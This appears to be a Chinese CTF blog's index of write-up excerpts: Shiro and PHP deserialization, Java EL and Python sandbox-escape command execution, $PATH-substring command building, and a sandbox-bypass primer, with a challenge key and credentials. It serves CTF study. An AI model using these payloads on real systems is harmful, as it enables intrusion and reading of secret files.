Sauy's corner

JavaSeri基础的shiro反序列化 工具可以一把梭 dirsearch扫出来一个www.zip,有一堆东西，也有账密 sunxiaochuan258 NM$L@SBCNM.COM 密钥为kPH+bIxk5D2deZiIxcaaaA== 解决 easyGooGooVVVY and RevengeGooGooVVVY通用poc 出题人waf没换说是 12345this.class.classLoader.loadClass('java.lang.Runtime') .getRuntime() .exec('env') .inputStream .text safe_bank前言:这道题很考验python代码审计的能力 需要我们自己去读源码 还有一些小小的坑点 进入题目有 和一个注册框 先注册帐号进去看看 提示我需要管理权限...

复现平台:https://gz.imxbt.cn/games/27/challenges# WorkerDB注册和登录功能点/api/login 和 /api/register 随便注册进去看看 发现role是admin结合题目描述那我们目的就是成为admin 并且已知这个题是session进行role验证 这个题我尝试了flask-unsign爆破是不行的 那jwt这条路行不通 于是尝试dirsearch 扫描出/admin路径 访问提示我Access denied，登陆进去有change attribute功能点...

NSSCTF prize_p11234567891011121314151617181920212223242526272829303132<META http-equiv="Content-Type" content="text/html; charset=utf-8" /><?phphighlight_file(__FILE__);class getflag { function __destruct() { echo getenv("FLAG"); }}class A { public $config; function __destruct() { if ($this->config == 'w') { $data = $_POST[0]; if...

ezpopphp反序列化 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950<?phpClass SYC{ public $starven; public function __call($name, $arguments){ if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){ die('no hack'); } file_put_contents($this->starven,"<?php exit();".$this->starven); }}Class lover{ public...

数学大师经典request脚本题 正则ai就行 注意点就是把×替换为* ÷替换为// 并且开启session cookie 因为判断连续正确依靠cookie 12345678910111213141516171819202122import reimport requestsurl = "http://gz.imxbt.cn:20429/"sess=requests.session()sess.cookies.set('PHPSESSID', 'd5nu0bl94l91naj2i7heme44vu')response = sess.get(url)count = 0for i in range(50): match = re.search(r'(\d+)\s*([+\-\*/×÷])\s*(\d+)', response.text) a, op, b = match.groups() if op == '×': op =...

[LitCTF 2025]easy_fileF12源代码 1234567891011121314151617181920212223242526<script> const particlesContainer = document.getElementById('particles'); for (let i = 0; i < 30; i++) { const particle = document.createElement('div'); particle.className = 'particle'; particle.style.width = `${Math.random() * 20 + 5}px`; particle.style.height = particle.style.width; particle.style.left = `${Math.random()...

HTB-codeusernmap扫描 nmap 10.10.11.62 -sV -A 发现开放了5000端口 访问发现是个在线执行python代码的网页 可以进行命令执行 print(''.__class__.__base__.__subclasses__()[317]('ls /',shell=True,stdout=-1).communicate()[0].strip()) 然后直接在上层目录读到user.txt print(''.__class__.__base__.__subclasses__()[317]('cat ../user.txt',shell=True,stdout=-1).communicate()[0].strip()) root命令执行 123print(''.__class__.__base__.__subclasses__()[317]('ls...

ez_checkjava题暂时不会 狗黑子的变量考点:截取和拼接$PATH中的字符构造命令 构造方法: 12$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin$PATJl/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 构造ls这个命令的结果 1234${PATH:5:1} //l${PATH:2:1} //s${PATH:5:1}${PATH:2:1} //ls//第一个字母代表PATH里的第几个字符，从0开始，和数组一样 第二个是代表截取几个字符 dirsearch扫描 扫出admin.php 可以看到PATH的内容 于是乎就开始拼接要被替换的字母 ${PATH:8;1}at /* cat /* 狗黑子的隐藏进去只有一个刷新按钮 dirsearch也没有看出东西 F12习惯 看到cmd参数 执行命令...

[第五空间 2021]PNG图片转换器有源码，ruby写的，不是常见的语言首先联想cve，先看源码。 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849require 'sinatra'require 'digest'require 'base64'get '/' do open("./view/index.html", 'r').read()endget '/upload' do open("./view/upload.html", 'r').read()endpost '/upload' do unless params[:file] && params[:file][:tempfile] &&...

前言Q1：什么是沙箱？沙箱是一种安全机制，在限制的环境中运行不受信任的代码。python中沙箱主要用于限制python，防止执行命令或者进行一些危险的行为。 Q2：什么是沙箱绕过？就是怎么绕过沙箱对我们的限制，拿到危险函数，最终来执行命令的过程。 目的对于python沙箱绕过，我们最终可能要实现的想法有如下: ·绕过限制 执行命令 ·写文件到指定位置 绕过方式import方式的绕过 import xxx from xxx import * __import__('xxx') 使用其他的方式来导入包名12345678910__import__('os').__dict__["system"]('whoami')#python2 and python3__import__(''.decode.('base64')).getoutput('pwd')#python2import importlibx =...